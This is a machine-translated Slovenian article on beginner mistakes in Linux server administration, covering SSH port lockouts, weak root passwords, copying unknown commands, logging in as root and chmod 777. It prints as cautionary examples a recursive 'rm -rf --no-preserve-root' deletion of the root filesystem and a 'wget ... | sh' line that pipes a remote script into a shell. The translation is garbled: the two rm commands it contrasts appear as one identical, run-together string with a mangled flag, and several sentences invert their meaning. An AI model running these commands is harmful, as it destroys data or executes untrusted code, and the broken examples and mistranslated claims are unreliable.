Phenquestions
Ukazna vrstica Linux skrbnikom strežnikov omogoča nadzor nad njihovimi strežniki in podatki, shranjenimi na njih, vendar jim le malo preprečuje izvajanje uničujočih ukazov s posledicami, ki jih ni mogoče razveljaviti. Nenamerno brisanje podatkov je le ena vrsta napake, ki jo storijo novi skrbniki strežnikov.
Zaklepanje tipk v notranjosti
Skrbniki strežnikov se na strežnike povežejo s storitvijo SSH, ki se običajno izvaja na vratih 22, in zagotavlja prijavno lupino, prek katere lahko preverjeni uporabniki izvajajo ukaze na oddaljenih strežnikih. Standardni korak utrjevanja varnosti je konfiguriranje SSH za sprejem povezav na druga vrata. Premik SSH v naključna vrata z visokim številom omejuje vpliv napadov brutalne sile; hekerji ne morejo poskusiti zlonamerne prijave, ko ne najdejo vrat, na katerih posluša SSH.
Skrbnik, ki konfigurira SSH za poslušanje na drugih vratih in nato znova zažene strežnik SSH, lahko ugotovi, da niso zaklenjeni samo hekerji. Če tudi požarni zid strežnika ni prekonfiguriran, da bi omogočil povezave na novih vratih, poskusi povezave ne bodo nikoli dosegli strežnika SSH. Skrbnik bo zaklenjen s svojega strežnika, ne da bi odpravil težavo, razen da bi odprl vstopnico za podporo pri svojem ponudniku gostovanja. Če spremenite vrata SSH, odprite nova vrata v konfiguraciji požarnega zidu strežnika.
Izbira gesla, ki se zlahka ugane
Napadi s silo so ugibanje. Napadalec preizkuša veliko uporabniških imen in gesel, dokler ne pritisne kombinacije, ki jim omogoči dostop. Slovarski napad je bolj izpopolnjen pristop, ki uporablja sezname gesel, ki so pogosto izločeni iz uhajajočih baz podatkov z gesli. Napadi na korenski račun so lažji kot na druge račune, ker napadalec že pozna uporabniško ime. Če ima korenski račun preprosto geslo, ga lahko v kratkem vdrete.
Obstajajo trije načini za zaščito pred napadi brutalne sile in slovarjev proti korenskemu računu.
- Izberite dolgo in zapleteno geslo. Preprosta gesla je enostavno zlomiti; dolga in zapletena gesla so nemogoča.
- Konfigurirajte SSH, da ne dovoli korenskih prijav. To je preprosta sprememba konfiguracije, vendar se prepričajte, da je "sudo" konfiguriran tako, da omogoča, da vaš račun zviša svoje privilegije.
- Namesto gesel uporabite overjanje na podlagi ključa. Prijave na podlagi potrdil v celoti odpravljajo tveganje za napade brutalne sile.
Kopiranje ukazov, ki jih ne razumete
Izmenjava skladov, napaka strežnika in podobna spletna mesta so rešilna sila za nove sistemske skrbnike Linuxa, vendar se izogibajte skušnjavi kopiranja in lepljenja ukaza lupine, ki ga ne razumete. Kakšna je razlika med tema dvema ukazoma?
sudo rm -rf --no -serve-root / mnt / mydrive /sudo rm -rf --no -serve-root / mnt / mydrive /
Preprosto je videti, kdaj so prikazani skupaj, vendar ne tako enostavno, ko iščete po forumih in iščete ukaz za brisanje vsebine nameščenega nosilca. Prvi ukaz izbriše vse datoteke na nameščenem pogonu. Drugi ukaz te datoteke izbriše in vse v korenskem datotečnem sistemu strežnika. Edina razlika je prostor pred zadnjo poševnico.
Skrbniki strežnikov lahko naletijo na dolge ukaze s cevovodi, ki naj bi delali eno stvar, v celoti pa nekaj drugega. Bodite še posebej previdni pri ukazih za prenos kode iz interneta.
wget http: // primer.com / verybadscript -O - | sh -Ta ukaz uporablja wget za prenos skripta, ki se napelje do lupine in izvede. Če želite to varno zagnati, morate razumeti, kaj naredi ukaz in kaj naredi preneseni skript, vključno s katero koli kodo, ki jo lahko preneseni skript sam prenese.
Prijava kot root
Medtem ko navadni uporabniki lahko spreminjajo samo datoteke v svoji domači mapi, korenski uporabnik na strežniku Linux le malo stori. Lahko zažene katero koli programsko opremo, prebere katere koli podatke in izbriše katero koli datoteko.
Aplikacije, ki jih izvaja korenski uporabnik, imajo podobno moč. Primerno je, da ste prijavljeni kot korenski uporabnik, ker vam ni treba ves čas "sudo" ali "su", vendar je nevarno. Napak lahko v nekaj sekundah uniči vaš strežnik. Programska oprema, ki jo upravlja korenski uporabnik, lahko povzroči katastrofo. Za vsakodnevne operacije se prijavite kot navaden uporabnik in povišajte v korenske privilegije le, kadar je to potrebno.
Neučenje dovoljenj za datotečni sistem
Dovoljenja za datotečni sistem so lahko za nove uporabnike Linuxa zmedena in moteča. Niz dovoljenj, kot je »drwxr-xr-x«, je sprva videti nesmiseln in z dovoljenji lahko preprečite spreminjanje datotek in zaustavite programsko opremo, ki počne, kar želite.
Sistemski skrbniki hitro ugotovijo, da je chmod 777 čarobno zaklepanje, ki odpravi večino teh težav, vendar je strašna ideja. Omogoča vsem, ki imajo račun, prebrati, zapisati in zagnati datoteko. Če ta ukaz zaženete v imeniku spletnega strežnika, vas prosijo za vdor. Dovoljenja za datoteke Linux so videti zapletena, če pa si vzamete nekaj minut časa, da se naučite, kako delujejo, boste odkrili logičen in prilagodljiv sistem za nadzor dostopa do datotek.
V dobi, ki enostavne uporabniške izkušnje ceni nad vsemi drugimi dejavniki, ostaja ukazna vrstica Linuxa odločno zapletena in odporna na poenostavitev. Ne morete se zmešati in upati, da bo vse v redu. Ne bo v redu in na koncu boste imeli katastrofo.
Če pa se naučite osnov - dovoljenj datotek, orodij ukazne vrstice in njihovih možnosti, najboljših varnostnih praks - lahko postanete mojster ene najmočnejših računalniških platform, ki so jih kdaj ustvarili.
